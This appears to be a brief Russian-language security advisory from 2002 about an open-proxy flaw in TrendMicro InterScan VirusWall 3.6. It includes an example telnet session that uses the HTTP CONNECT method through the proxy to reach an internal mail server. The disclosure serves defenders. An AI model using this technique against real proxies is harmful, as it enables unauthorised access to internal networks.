Проскси уязвимость в TrendMicro's InterScan VirusWall

Дата публикации:
10.12.2002
Всего просмотров:
907
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Обнаруженная проблема в TrendMicro's InterScan VirusWall позволяет использовать метод CONNECT чтобы подключится к другим серверам, типа внутреннего почтового сервера. Пример:
You  = 6.6.6.666
Trendmicro ISVW = 1.1.1.1 (HTTP proxy at port 80)
Internal Mailserver = 2.2.2.2

Connect with "telnet 1.1.1.1 80" to ISVW proxy and enter: CONNECT 
2.2.2.2:25 / HTTP/1.0
Уязвимость обнаружена в TrendMicro's InterScan VirusWall version 3.6

Ссылки: Proxy Vulnerability in TrendMicro InterScan VirusWall
или введите имя

CAPTCHA